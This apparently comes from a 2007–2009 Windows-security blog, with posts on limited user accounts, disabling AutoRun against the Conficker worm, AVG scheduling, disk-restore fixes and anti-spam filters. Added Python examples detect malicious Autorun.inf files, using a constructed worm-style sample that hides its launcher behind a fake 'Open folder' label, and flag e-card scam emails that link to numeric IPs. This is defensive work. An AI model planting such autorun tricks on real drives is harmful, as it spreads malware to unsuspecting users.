Although I use Firefox as my primary (default) browser and web design test tool, I have kept the latest version of Opera browsers installed as well, just to make sure it renders my layouts correctly. Today, March 3, 2009, I received a security alert that Opera Software, of Norway, had released a security update to the Opera Browser. This was in response to a vulnerability reported on CERT, on March 3, 2009. The new version is number 9.64. Like I usually do, I downloaded the new version, ran the setup file as an Administrator (using Run As), from my XP Professional Power User account and upgraded from the previous version (9.63). When Opera opened everything looked fine and I closed it and went on about my business, working with html files I was editing.

Begin Rant:

It was about an hour later, still logged into my Power User account, that I went to the still-open directory where these .html files live and double-clicked on one, expecting it to open in Firefox, which is my default browser. Instead, to my surprise, it opened in Opera! I had not made any changes in the setup of Opera. I told the program to perform an Upgrade installation, just like the previous versions had been. None of them ever stole my default browser association and few even asked about being made the default browser. This is something new and, as it turned out, slightly difficult and aggravating to resolve.

When I found that Firefox was not opening .html files any more I checked its options to see if it was still the "default browser," which it claimed it was. Had it not been, I would have been able to make it so, using the Check Now button (Tools > Options > Advanced > System Defaults). But, Firefox thought it still was the default browser, so I tried disassociating .html files within Opera, but nothing changed. About that time I decided to switch to my Administrator level account to uninstall Opera and see if it gave back the previous association to Firefox, but no luck. I went into Set Program Access and Defaults and reset Firefox as the Default browser, which worked in the Admin account, so I logged off it and back into the Power User account. Note that you cannot change the Program Access and Defaults from a Power User account, only an Administrator level account, in XP.

Back in my Power User account I found that it now associated .html files with Windows Notepad! Every html file I double clicked on opened in Notepad, not Firefox! I decided to do an end run around the Windows File Association defense and right clicked on an html file, in the aforementioned folder, and chose Properties. The Properties sheet showed the html files opened with Notepad and offered a button to Change that. I used the button and chose Firefox to open .html files, clicked Apply and OK. When I tried opening an html file it still wanted to use Notepad, so I restarted the computer. This act alone cures a lot of mess-ups and it fixed this one.

The point of this article isn't just to show my readers how to recover from a browser file type association theft, but also to let Opera Software know that one of their users is pretty #@$%*~ off right now about having to go through all this work to keep a long ago established file type association that their update broke, without any word of warning. Also, it may be a long time before I reinstall an Opera Browser, which I was only using to test website layouts for compatibility anyway.

End Rant


February 18, 2009

Running a PC with reduced user privileges stops 92% of malware

According to a recent study by the BeyondTrust Corporation, titled "92 Percent of Critical Microsoft Vulnerabilities are Mitigated by Eliminating Admin Rights," most attacks that exploit critical Windows vulnerabilities, known or not yet discovered, are mitigated if the targeted PC is being operated with reduced user privileges. This means not running as an Administrator.

BeyondTrust's findings show that among the 2008 Microsoft vulnerabilities given a "critical" severity rating, 92 percent shared the same best practice advice from Microsoft to mitigate the vulnerability: "Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights." This language, found in the "Mitigating Factors" portion of Microsoft's security bulletins, also appears as a recommendation for reducing the threat from nearly 70 percent of all vulnerabilities reported in 2008.

As far back as May, 2007, I have published blog articles professing the added security to be gained by operating a PC with reduced user privileges. Furthermore, I published a web page titled: User Account Privileges Explained, describing the differences between the various types of user accounts available in Windows 2000 and XP. That page also contains instructions for elevating reduced user privileges by using the Windows "Run as" right-click option, when installing, or launching a program that was built with the assumption that a member of the Administrators Group would be running it.

Some of the benefits derived by reducing your user privileges for your daily browsing account may include the following:


  • Most viruses cannot be installed

  • Most spyware cannot be installed

  • Most adware cannot be installed or survive a reboot

  • Browser BHOs that hijack your home page and search may not be fully installed, or survive a reboot

  • Kernel-mode rootkits cannot be installed (loading a driver requires administrative rights)

  • Mistakes you make by visiting compromised websites will probably fail to cause any damage

  • Botnet executables cannot take control of your computer

  • Fake anti virus or anti spyware popup alerts will not be installed, or survive a reboot

  • System Restore, Windows Defender, the Windows Firewall and Automatic Windows Updates cannot be disabled

  • Your HOSTS file cannot be poisoned

  • Worms, like the Conficker Worm cannot be installed, even via AutoPlay/AutoRun exploits

  • Changes cannot be made to the HKLM branch of the Windows Registry

  • Some programs cannot be installed, unless you use "Run as"

  • Files cannot be saved to, deleted from, or overwritten with fake copies, in the Windows and System32 directories and sub-directories


To achieve all of the above protection one should change their daily browsing account type from "Computer Administrator" to "Limited User" (Windows 2000 and XP) or "Standard User" (Windows Vista and Windows 7); both are available in every edition of Windows, not only the Business or Professional ones. Avoid the "Power Users" group that Windows 2000 and XP offer as a middle ground: it can install software and write to Program Files and parts of the HKLM Registry branch, which is enough for a program running as a Power User to make itself an Administrator, so it forfeits most of the benefits listed above. The benefits also presume that the owner or user is not tricked into installing the malware by using the "Run as (Administrator)" command. If you download a Trojan Horse program that you think is something useful and it turns out to be malware in disguise, you can infect the computer by running it as an/the Administrator. They further presume there is no unpatched local privilege-escalation bug on the PC, and they do not stop malware that is content to run inside your own profile (started from a per-user Run key or by changing your browser's settings), which is why the list says "most" and "probably" rather than "never". Common sense and a high level of suspicion, along with a judicious amount of Googling about unrecognized programs, before installing them, can save your butt.

Continue reading "Running a PC with reduced user privileges stops 92% of malware" »


January 22, 2009

How to effectively disable AutoRun-AutoPlay in Windows computers

Takeaway:
This article about (disabling) AutoPlay was supposed to be a sub-section in another article that I am composing about the Conficker/Downadup Worm, but in light of fresh information it has been promoted into its own article. If you already understand how AutoRun works skip down to the "Solution" section, in my extended comments.

AutoPlay is a long-time feature included in all Windows operating systems from Windows 95 onward. It allows data, video and music CDs and DVDs to start automatically when a pre-recorded disc is inserted into the drive tray and the tray is closed, which is a convenience for most users. From Windows XP onward, when you insert a blank recordable disc into a media recorder a box pops up asking what you want to do. This is familiar stuff by now.

When you plug in a USB thumbdrive, camera memory module, external USB drive, Firewire disk, or map a network drive, one of two things usually happens. Normally, a box pops up asking what action you wish to take, with a default action highlighted. Most people usually choose to open these drives in a folder view and often select the option to remember that decision and not ask again. If they have selected that option the next time they plug in such a drive or module the device will automatically open as expected, without prompting.

When an external drive or device is plugged into your Windows PC and AutoPlay is on (which it usually is), a file named Autorun.inf in the root of that drive (often marked hidden) can cause a program on the device to execute immediately. This is how setup programs run automatically when you insert a program installation disc. These Autorun.inf files are usually very small, just a few lines of INI-style text pointing to the setup executable, and can be viewed in Notepad.

However, malware authors have begun exploiting this feature to spread their viruses and hostile programs to computers via removable drives and memory sticks, using a hidden Autorun.inf to run the Conficker/Downadup Worm's installation routine automatically. This happens the moment the device is plugged into a PC that has AutoRun enabled, which is the default. This is one of the ways this Worm spreads in multi-computer environments. If an employee acquires the Conficker Worm while out of the office and then saves work documents to a thumbdrive, then plugs that drive into his or her work computer, the Worm can infect that computer and then attempt to infect the entire LAN!
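Because an Autorun.inf is plain INI text, it is easy to inspect before a drive is trusted. The following Python script is an added example, not code from this article or from the US-CERT bulletin: it parses the [autorun] section, lists every entry that can make code run (open=, shellexecute= and shell\verb\command=), and applies a few heuristics for the tricks worms use in these files, such as an action= label that imitates Explorer's own "Open folder to view files" choice. Both sample files are constructed; the "RECYCLER" path and the .vmx file name stand in for whatever a real worm would use.

```python
import re

# Added example, not from the article or US-CERT: a parser for Autorun.inf
# files like the ones described above, plus a few heuristics for the tricks
# worms play in them. Both sample files below are constructed; the
# "RECYCLER" path and .vmx name stand in for whatever a real worm would use.

SAMPLE_VENDOR_CD = """\
[autorun]
open=setup.exe /silent
icon=setup.exe,0
label=Product Installer
"""

SAMPLE_WORM_STYLE = """\
[AutoRun]
; presents itself as a plain folder in the AutoPlay dialog
Action=Open folder to view files
Icon=%SystemRoot%\\system32\\shell32.dll,4
Label=Removable Disk
ShellExecute=RECYCLER\\tmp\\update.vmx,launch
shell\\open\\command=RECYCLER\\tmp\\update.vmx
UseAutoPlay=1
"""

LAUNCH_KEY = re.compile(r"open|shellexecute|shell\\[^\\]+\\command")
SYSTEM_LOOKING_DIRS = ("recycler", "$recycle.bin", "system volume information")
EXECUTABLE_EXT = (".exe", ".com", ".bat", ".cmd", ".msi", ".scr")


def parse_autorun(text):
    """Key/value pairs of the [autorun] section, keys lowercased; section
    and key names are case-insensitive as in any INI file."""
    entries, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_commands(entries):
    """The entries that make code run: open=, shellexecute=, and
    shell\\<verb>\\command= (the latter back Explorer's context menu and
    the default double-click action, so even browsing the drive can fire)."""
    return [(k, v) for k, v in entries.items() if LAUNCH_KEY.fullmatch(k)]


def target_of(value):
    """The file an open=/shellexecute= line would start: first token,
    before any ',param' or ' arg' tail, quotes removed, lowercased."""
    head = value.split(",", 1)[0].strip().strip('"')
    return head.split()[0].lower() if head.split() else ""


def assess(entries):
    """Reasons the file looks malicious (empty means nothing matched,
    not that the file is safe)."""
    reasons = []
    if "open folder" in entries.get("action", "").lower():
        reasons.append("action= copies Explorer's own 'Open folder to view files' choice")
    commands = launch_commands(entries)
    for key, value in commands:
        target = target_of(value)
        if any(d in target for d in SYSTEM_LOOKING_DIRS):
            reasons.append(f"{key}= starts a file hidden in a system-looking folder: {target}")
        if target and not target.endswith(EXECUTABLE_EXT):
            reasons.append(f"{key}= target does not have an executable extension: {target}")
    if commands and "shell32.dll" in entries.get("icon", "").lower():
        reasons.append("icon= borrows a Windows icon so the device looks like a plain drive")
    return reasons


if __name__ == "__main__":
    for name, sample in (("vendor CD", SAMPLE_VENDOR_CD), ("worm-style", SAMPLE_WORM_STYLE)):
        e = parse_autorun(sample)
        print(name, "->", launch_commands(e), assess(e) or "nothing suspicious")
```

The heuristics are deliberately cheap and produce no verdict of "safe"; a vendor disc that legitimately runs setup.exe passes, while a file that hides its payload in a folder Explorer normally hides, gives it a non-executable extension, and dresses itself up as a plain drive is reported line by line so you can see what would have run.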

To protect networks and standalone computers from becoming infected via removable drives that are infected various sources have recommended disabling the AutoPlay feature. Microsoft has entire pages devoted to this trick. Also, I have read details about fine tuning your AutoPlay restrictions so they only apply to removable drives, not CDs and DVDs. This all sounded like a good preventative measure until today, when I read Technical Cyber Security Alert TA09-020A, on the US-CERT website. That bulletin makes it clear that simply disabling AutoPlay via Group Policy or the recommended Registry hacks would NOT prevent infections via removable devices. This is because these hacks and workarounds do not address the problem that Autorun.inf is still parsed for instructions, which are then executed automatically, even if AutoPlay is turned completely OFF!

From the CERT bulletin:

The Autorun and NoDriveTypeAutorun registry values are both ineffective for fully disabling AutoRun capabilities on Microsoft Windows systems. Setting the Autorun registry value to 0 will not prevent newly connected devices from automatically running code specified in the Autorun.inf file.

By placing an Autorun.inf file on a device, an attacker may be able to automatically execute arbitrary code when the device is connected to a Windows system. Code execution may also take place when the user attempts to browse to the software location with Windows Explorer.

Read my extended comments for solutions to this vulnerability.

Continue reading "How to effectively disable AutoRun-AutoPlay in Windows computers" »


July 5, 2008

Create a scheduled task to run the AVG Free 8 Updater

On July 24, 2006, I wrote a technical article on my Blog titled: "Using Windows Task Scheduler to Check for/install AVG-Free Anti Virus Updates." It described a simple method end users can apply to cause the AVG Free 7.5 Updater file to run every hour, instead of just once a day.

Now it is the summer of 2008 and AVG Free is at version 8.0, with version 7.5 set for discontinuation on December 31, 2008. The AVG Free updater still only checks once per day, but the command that worked in the previous version also works in version 8.0, with some path and file name adjustments. (AVG paid versions do allow multiple daily updates and scans).

If you use AVG Free 8.x and want to have it check for updates on an hourly basis (or some other personal schedule), the information that follows will guide you through the process. I am writing this using Windows XP Professional, so these details may be different if you use Windows Vista.

You can find information about the new Task Scheduler for Windows Vista here (Microsoft MSDN), or at LifeHacker.com (lots of screen shots - JavaScript required).

First, open the Task Scheduler by clicking on Start > (All) Programs > Accessories > System Tools - and clicking on Scheduled Tasks. Double-click on the icon labeled "Add Scheduled Task." The Scheduled Task Wizard will open. Click Next. A list of installed programs will appear with a scroll bar on the right. Scroll down to see if AVG Free 8.0 (or such) is listed and highlight it if it is, then click Next. If AVG Free 8.0 (or 8.x) is not listed use the Browse button to locate it. The path to the updater executable should be: C:\Program Files\AVG\AVG8\avgupd.exe, with a default installation. If you have customized your installation your path or folder name may vary, but the file name is constant.

Once you locate the AVG updater executable, "avgupd.exe," highlight it and click Next. Type a name for this task in the top input field. I used "AVG 8 Updater." Select the "radio" option "Daily" and click Next. Select a start time and day, making sure you also select "Every Day," or "Weekdays," depending on your requirements (home or office). Click Next. Enter a User Name and Password, if you have one assigned to your logged-in identity, then click Next. If you want to fine tune your options for the updater task check the box beside "Open advanced properties for this task when I click finish."

The Advanced Properties page is where you enable or disable the task, change the schedule, manage the power settings, and decide if you want to wake your computer to run the task.

Here are the settings I used in my AVG Free 8.0 Updater scheduled task:

Task tab
Task: AVG 8 Updater
Start in: "C:\Program Files\AVG\AVG8"
Run: "C:\Program Files\AVG\AVG8\avgupd.exe" /SCHED=

Schedule tab
Schedule Task: Daily - (set a start time) - (AM/PM)
Schedule Task Daily: Every 1 day
Advanced button on Schedule Task
Check mark in "Repeat Task"
Every: 1 hours
Duration: 24 hours

Settings tab
Scheduled Task Completed: Stop the task if it runs for: 1 hour
Power Management: Check box for "Wake the computer to run this task" (NOT recommended for hourly tasks)

Make any other setting changes you want, then click Apply, then OK.

Also, under the Security tab, make sure that your logged-in identity is allowed to run the task, if you are not an Administrator. If you run Windows 2000 or XP Professional you can make your daily browsing account a Power User and add yourself to the Backup Operators Group, which allows you to schedule and run backups and other tasks. Be aware of what that grants: membership in Backup Operators carries the SeBackupPrivilege and SeRestorePrivilege rights, which let the account read and write any file on the system regardless of its permissions, so an account in that group is only nominally "reduced privilege." If the task only needs to start a program, prefer a plain limited account that owns the task and reserve the extra group membership for accounts that genuinely run backups.

You can learn about protecting your Windows PC by running as a reduced privileges user, on my Blog article: Limited User Privileges Protect PCs From Adware, Rootkits, Spyware and Viruses, or on my FAQs page titled: Windows 2000 and XP User Account Privileges Explained.


June 11, 2008

Disk problems after restoring an image and how I solved them.

I began experiencing problems Monday night (June 9), after using Acronis True Image 11 to restore my Windows XP Professional SP3 computer, after an experiment trying to convert my setup from single SATA to SATA RAID failed miserably. Lesson #1: If the OS is already installed and you were thinking about converting the boot system to RAID, FORGET IT!

After I finally forced my boot drive out of being labeled as a dynamic RAID disk I was able to load a saved image onto it and boot back into Windows XP (SP3), after 13+ hours of downtime. More on how I did this in my extended comments section.

Anyway, once I finally got back into Windows I left the computer alone for a while and did other things. When I came back to check for new email and see if my scheduled Windows and Acronis backup tasks were running all I saw was a hideous BSOD, with a Stop Error labeled: "BAD_POOL_HEADER," followed by these machine debug codes: STOP: 0x00000019, 0xE106F3F8, 0xE106F418, 0x0C040401. At first I thought this was a simple glitch, but I found out it wasn't, later on. My solution is further down this article.

While I was trying over and over to restore my saved image, using the Acronis Recovery CD, to one of the 250 GB hard drives that I mucked up by initializing RAID, I noticed that my external USB drive was not listed as an accessible location for restoring a backup image, even though it was connected and turned on. I had images on both an internal and external hard drive, with the most recent being on the USB drive. So, I got out of Acronis and tried booting from my Ubuntu Hardy Heron (8.04) live CD. My intention was to copy the newer image from the USB disk to the internal backup disk. When I got into the Linux desktop and opened "Computer" I saw both the internal and external disks, with their correct disk labels, but was unable to "mount" (open) either of them! The error message pop-up contained the following information (my interpretation, not verbatim):

This disk cannot be mounted because it is marked as being in use by Windows. This is sometimes caused by improperly removing a connected device without first ejecting it using the "Safely Remove Hardware Wizard."

This started me thinking about how the last time I used the external USB drive, when I was done saving an image to it I reached behind it and flipped the power switch off, instead of "safely stopping and removing" it. Lesson number two: always use the Safely Remove Hardware utility to stop/eject your USB devices!

So, here I was, back in Windows again, with the USB drive turned on and fully visible through My Computer. I dutifully went to the System Tray and right-clicked on the Safely Remove Hardware icon, to do it the right way, and was greeted by another cryptic pop-up error message, saying:

"An exception occurred while trying to run "Shell32.dll, Control_RunDLL hotplug.dll."

A Google search for that exception brought me to this page on the Acronis True Image Forum (reply #69), at Wilderssecurity.com. The cause of the hotplug.dll failure was an invisibly corrupted registry entry for each of the volumes labeled as a "Generic Volume." Apparently, when these disks were restored by Acronis True Image their registry entries were not "NULL Terminated," and one had the letter H appended to its description, in Device Manager > (View Hidden Devices option selected) > Storage Volumes >> Generic Volume. To fix the problem all I had to do was right-click on each generic volume and select Update Driver. After all of these disks were "updated" I rebooted and the exception in hotplug.dll was gone.

How I fixed the BSOD Stop Error BAD_POOL_HEADER
In the beginning of this article I told you about getting a BSOD whenever a scheduled Windows Backup requiring "shadow copy" was initiated (save System State). I narrowed this down to only a System State backup causing the Stop Error. The solution was similar to the hotplug issue, but, instead of "Updating" the driver for each Generic Volume, I "Uninstalled" each of them, then rebooted twice. After the second reboot they were fully re-detected and ready to use and the hotplug problem was also gone. This is probably the best way to fix these problems.

Continue reading "Disk problems after restoring an image and how I solved them." »


January 16, 2008

10 steps Windows PC owners can take to secure their computers

In today's world the Internet is no longer a safe place for Windows PC users (not that it ever was). Criminals are exploiting vulnerabilities in web sites, web servers, email, browsers, and unsecured, or under-secured, Windows OS computers.

Some of the current exploits making the rounds are using JavaScript functions to install malware onto vulnerable Windows based PCs. Some of these exploits are being secretly installed into the operating system of web servers, thus causing the exploit code to appear on every web site hosted on that server (a horrible situation). The individual web site customers are at the mercy of their hosting company to detect and repair the rootkit infection that adds the exploit codes to every home page on that server. Web hosts are usually informed about such exploits in the wild that target their operating systems, and they usually apply the necessary patches and rebuild Apache, or patch the Windows Server OS, as soon as possible.

Another related attack vector comes from individual web sites that are using insecure scripts, for which various hackers are searching. Hackers send bots to probe every website they can find, following links in search results and on websites they have already visited. The bots are programmed to attempt to run various types of exploits against that website. The exploit attempts I see most often involve trying to exploit PHP scripts, or web pages, to perform HTTP redirects to hostile scripts hosted on other servers. A website owner who is not fully up to speed about security issues may install a vulnerable script, or copy insecure code from an open source project, only to have his website used as a redirector to hostile code.

Finally, there are JavaScript exploits being used on the web pages hosted unknowingly, on Windows computers that have been taken over by the Storm Trojan. When people are enticed to visit those web pages the JavaScript routines will attempt to download and run hostile code against them, which if successful will add their computer to this ever-growing BotNet. See my recent blog post about the Storm Botnet, or search my blog for the phrase "Storm Trojan."

Here are 10 steps that PC users can take to protect their computers from all JavaScript exploits.


  1. Apply all available Windows/Microsoft Updates, including Office product patches. This is a MUST DO.

  2. If you have not updated your copy of Internet Explorer to version 7, do so now, then use Windows Updates to apply all released patches for it. IE 7 has built-in security features that simply cannot be applied to previous versions of that browser.

  3. Set your Internet Explorer security level to medium high, or high. This will cause prompts to appear when scripts are asking for permission to run, which will be on almost every website you visit. This will drive you crazy, but at least give you a fighting chance.

  4. Turn on the anti-phishing filter in IE 7.

  5. To avoid the craziness that goes with securing Internet "Exploder," download and install the latest version of the Firefox browser, make it your default browser for browsing the Internet. Firefox does not run ActiveX controls at all and does not allow stealth downloads or installs. Every add-on or download must be manually approved. Set the options in Firefox to automatically check for updates to both the browser and any add-ons you've installed.

  6. Install the No-Script add-on for Firefox, which blocks all known JavaScript and iFrame exploits, if you configure it properly. No-Script blocks JavaScript functions on websites, by default, but allows you to override it selectively, for sites you trust.

  7. If you are uncommitted regarding an Internet Security product, try Trend Micro PC-cillin Internet Security 2008. It has resident shields that will intercept hostile scripts embedded in web pages, before they are downloaded to your browser. It also removes viruses, rootkits and spyware.

  8. If you are currently operating as the Computer Administrator you should consider reducing your exposure to malware by changing to a Limited User account. This is not a trivial matter, but offers tremendous protection against accidental infections. I have also posted an article on my blog explaining how running with reduced privileges can protect you online.

  9. If you are on broadband Internet make sure that you have a NAT (Network Address Translation) router between the modem and your computer. NAT routers hide your computers from incoming TCP/IP and UDP probes by malicious scripts and infected computers. Some modems have built-in NAT router sections, but some don't. A straight connection from a broadband modem to a PC can make it vulnerable to scripted attacks aimed at your TCP ports. A software firewall is a must for PC owners. Windows XP contains a built-in one way (incoming) firewall, while Vista has a two way firewall (in and out).

  10. Scan for acquired malware threats often, using up-to-date applications and definitions.

By applying these 10 steps you will have secured your PC as much as possible, while still allowing it to function on the Internet. The advice about running with reduced user privileges has been officially applied by Microsoft to their Windows Vista operating system. Vista users normally operate with reduced privileges, unless administrator overrides are required to install or uninstall a program or driver. It is still up to the user to determine if this is safe or not.

In the end, it is always up to the computer owner to decide what level of security they can tolerate, and what programs or add-ons they will allow to be installed onto their computers. If the user is duped by a cleverly worded spam email message, into clicking on a hostile link, no security warnings known to man will prevent them from installing what might turn out to be a Trojan horse application. It happens every day! Be vigilant and practice safe Hex!


September 5, 2007

Migrate your programs and settings from your old computer to a new computer

Back in the days of Windows 95 I bought a program called PowerQuest Drive Image. Drive Image allowed me to take snapshots of my entire hard drive and save them to other hard drives, to be used to recover a failed master hard disk. Drive Image contained a fabulous utility named Magic Mover, which allowed me to move entire programs, with all of their settings and distributed system files, from one PC, or partition, to another. Unfortunately, Powerquest is no more, along with Magic Mover.

While answering questions on a computers section of a specialty forum, where I act as moderator, a member asked questions about moving programs, settings and preferences from his XP computer to his new Vista computer. Another member pointed him to the Windows Vista "Easy Transfer" utility, which can "move" a number of programs, which it knows about, from an XP computer to the Vista computer, over a cable or network connection.

Unfortunately, the original poster had programs he wanted moved that are not listed in the Easy Transfer database. That's when another member mentioned a program by LapLink, called PCMover. This program can indeed move any or all of your programs, files, settings, or desktops between two computers running Windows 95, 98, NT, Me, 2000, Media Center, XP, or Vista. Instead of taking one or more days to migrate all of your programs and settings, you can do this with PCMover in a few hours, or less.

PCmover can migrate your PC across a network, Laplink USB cable, Laplink parallel cable, Windows Easy Transfer Cable, or any type of removable media that can be read by both PCs. If your computer has multiple users, PCmover gives you the option to migrate some or all of the users at once. The security information about file ownership and access control is preserved for each user. You can even use PCmover to migrate your PC to an Intel-based Mac!

A single license of PCmover ($49.95) allows you to migrate from a single old (source) PC to a single new (destination) PC. Additional migrations require the purchase of additional licenses. For most end users this is not a problem, since they rarely have to perform such major transfers of programs. There is significant discount pricing available from LapLink, for people or businesses requiring multiple computer migrations, in 5 or 10 packs of migration licenses. Upon payment of a migration fee, the software transfers files and settings from your old computer to your new computer.

You can read more about PCMover - here.


August 9, 2007

MailWasher Filter Solutions for ECard Trojan Scams

By now most of you have seen hundreds of "Postcard" email scams in your inboxes and are getting tired of hitting the delete button (hopefully you are deleting them!). These messages have subjects containing phrases implying that a Friend, or Class-Mate or "Worshipper" (etc) has sent you a postcard, or ecard, or greeting postcard, etc. They all contain false details about an alleged e-card that is waiting for you if you click on the link supplied, usually with a numeric IP, followed by a forward slash, a question mark, then a bunch of random characters, leading to a compromised PC hosting a web page containing hostile JavaScript to redirect you to a website that has the Storm Worm infector. Anybody who is foolish enough to click on that link, in a Windows PC, or Windows powered hand-held device, will probably be infected with the Storm Worm, or a variant thereof, and their PC will become a spam relay in a BotNet.
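As an added example (my own code, not from this post and not MailWasher's filters.txt rule syntax, which the post does not reproduce), here is a Python heuristic that applies the indicators described above to parsed messages: e-card/postcard wording, a generic relationship word in the subject, and a link to a bare numeric IP followed by "/?" and a run of random characters. The three sample messages are constructed, the IP address is taken from the 192.0.2.0/24 documentation range, and the verdict names are my own.

```python
import re
from email import message_from_string

# Heuristics drawn from the indicators the post describes. The names,
# thresholds and verdict labels are hypothetical; this is not MailWasher
# filter syntax.
ECARD_WORDING_RE = re.compile(
    r"\b(?:post\s*card|e-?card|greeting\s*(?:post)?card)\b", re.IGNORECASE)
GENERIC_SENDER_RE = re.compile(
    r"\b(?:friend|class-?mate|worshipper|colleague|neighbou?r)\b", re.IGNORECASE)
# http://<dotted-quad>[:port]/?<run of random characters>
NUMERIC_IP_LINK_RE = re.compile(
    r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?/\?[A-Za-z0-9]{4,}",
    re.IGNORECASE)


def text_body(msg):
    """Concatenate the decoded text/plain parts of a parsed message."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_type() != "text/plain":
            continue
        payload = part.get_payload(decode=True)
        if payload:
            charset = part.get_content_charset() or "utf-8"
            chunks.append(payload.decode(charset, "replace"))
    return "\n".join(chunks)


def classify(raw_message):
    """Return (verdict, indicators, links) for one RFC 822 message string.

    "ecard-scam" means a numeric-IP "/?token" link appears together with
    e-card wording; "suspicious" means only some indicators matched;
    "clean" means none did.
    """
    msg = message_from_string(raw_message)
    subject = msg.get("Subject", "")
    body = text_body(msg)
    indicators = []
    if ECARD_WORDING_RE.search(subject) or ECARD_WORDING_RE.search(body):
        indicators.append("ecard-wording")
    if GENERIC_SENDER_RE.search(subject):
        indicators.append("generic-sender")
    links = NUMERIC_IP_LINK_RE.findall(body)
    if links:
        indicators.append("numeric-ip-link")
    if "numeric-ip-link" in indicators and "ecard-wording" in indicators:
        return "ecard-scam", indicators, links
    if indicators:
        return "suspicious", indicators, links
    return "clean", indicators, links


# Constructed sample messages (not real spam captures).
SCAM_MSG = """From: postcard@example.invalid
Subject: Your Class-Mate has sent you a postcard!

Hello! Your class-mate has sent you a greeting card.
Pick it up at: http://192.0.2.17/?2b7e151628aed2a6
"""

LEGIT_MSG = """From: alice@example.com
Subject: Q3 meeting notes

Slides are at https://intranet.example.com/q3/notes.pdf - see you Monday.
"""

BORDERLINE_MSG = """From: cards@example.net
Subject: Your e-card is ready

View it at https://cards.example.net/view?id=9180
"""

if __name__ == "__main__":
    for name, raw in (("scam", SCAM_MSG), ("legit", LEGIT_MSG),
                      ("borderline", BORDERLINE_MSG)):
        verdict, indicators, links = classify(raw)
        print(f"{name:10s} {verdict:11s} {indicators} {links}")
```

Requiring two independent indicators before calling a message a scam is the point of the combined rule: a legitimate greeting-card service that links to a hostname only rates "suspicious", while the numeric-IP "/?random" link on its own would catch the Storm run the post describes even if the spammers change the subject wording.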

If you use MailWasher Pro to screen your incoming email I have an automatic solution for detecting and deleting these, and most other spam messages in the wild; my custom MailWasher filter rules targeting current types of spam. MailWasher Pro uses a text file called filters.txt to list custom conditions for identifying and acting against spam that matches the statements in these user configurable rules. A default installation produces a very basic filters.txt file, which is waiting for you to add your own custom rules to it.

If you don't know how to create your own MailWasher filters, visit my MailWasher Pro Filters page, where you will find my own list of custom filters for use with the MailWasher Pro email program. The filters will load into an iframe in the middle of the page (No, this is not an exploit, just an HTML inline frame with visible contents). There is a large set and a smaller set of filters. I use the smaller set which is targeted at the most recent varieties of spam in the wild. The large set includes the new rules plus anti-spam rules going back about 5 years.

To use my filters in your MailWasher application you should first copy the contents of the set you prefer to use (click inside iframe, press Control + A, press Control + C), or right-click on one of the file links on the web page and save it as "filters.txt" on your desktop. With MailWasher open click on Help > "About" which will open a box with the version and copyright details. At the bottom of this box there is a link to your personal profile data folder for MailWasher Pro. Click on the link at the bottom of the About box to open the MailWasherPro Application Data folder in a window, then close MailWasher. You must close MailWasher before editing filters.txt, otherwise your changes will be overwritten by the program. The only time you can work on filters with MailWasher open is if you use the Filters utility from within the program, to create or edit rules.

There will be a file named filters.txt in your MailWasher Pro application data folder. You will either overwrite its contents, or add to them, depending on whether you have created any of your own filter rules. If you haven't created your own filters and you downloaded one of my filters files and saved it as "filters.txt", just drag it from your desktop into the MailWasher Pro data folder and drop it there, allowing it to overwrite the existing copy.

If you chose to copy the contents in the iframe for pasting into the program's filters.txt, open filters.txt in NotePad, in the "MailWasherPro" Application Data folder. If you are going to add my filters to your existing rules choose a line where you want them to start (the beginning is a great place), click on the beginning of that line and press Control + V, to paste them in at that point. If you are going to overwrite the existing filters entirely click inside it and press Control + A (Select All), to highlight all of the contents, then press Control + V to paste my filter rules into the document, overwriting the contents, then save the changes (Alt > F > S). Make sure you don't have any blank lines between rules and that each rule begins on a new line. Turn off Word Wrap. Instructions are typed in the top comments of my rules.

After you have pasted in the new rules, close filters.txt, then open MailWasher Pro. My filters should now be loaded into the program and will delete most current incoming spam, either automatically, or manually. Use Control + F7 to display or hide the filter sidebar, in the program interface. Watch for spam messages that are hidden by some rules, which you must delete manually, by clicking on Process Mail (F6), on top of MailWasher Pro. Make it a practice to click on the Process Mail button every hour, whether there is anything marked for deletion or not. This frees up RAM and removes temporary data files created while the program is running. It will also delete hidden spam messages.

I update my rules very frequently, sometimes more than once on the same date. I post the last updated date in the comments of the filters, in the top of the files. Comments begin with //. Be sure you bookmark my MWP filters page and check it often for new or altered filters. There is a link under the iframe to sign up for alerts from ChangeDetection.com whenever it detects a new date stamp on the page.

Wizcrafts Custom MailWasher Pro Filters are discussed on the Firetrust MailWasher forum, where I post notices about filter updates and where other MailWasher users provide input about them.


July 31, 2007

Wizcrafts MailWasher Pro Anti-Spam Filters Updated Frequently

For those of you who don't know, MailWasher Pro is a renowned email screening, spam detection/deletion program, designed for people who use a POP3 email client to send and receive their email (Outlook, Outlook Express, Windows Mail, Thunderbird, Eudora, etc). It can be set to automatically check all of your POP3 email accounts at any whole-minute interval you choose and contains built-in tools to detect spam messages and viruses, then deal with them in the manner you define. MailWasher Pro uses a variety of spam detection techniques including a Bayesian learning filter (with user overrides), configurable blacklists and whitelists, a database of known/reported spam, domain name server (DNS) blocklists, and user configurable custom filter rules to block various types of spam, or other unwanted email. Once incoming spam has been deleted from your email servers you can download legitimate messages to your email program, which should be set to manual mode when used with MailWasher as the front-end screener.

The custom filters are very powerful tools that many people don't fully understand, hence they often go unused by less technical users. Fortunately for them, I am part of a group of technically advanced MailWasher Pro users who have learned to develop and use these custom spam filters. In fact I am the author of many of the filters now in common use by MailWasher Pro users around the World.

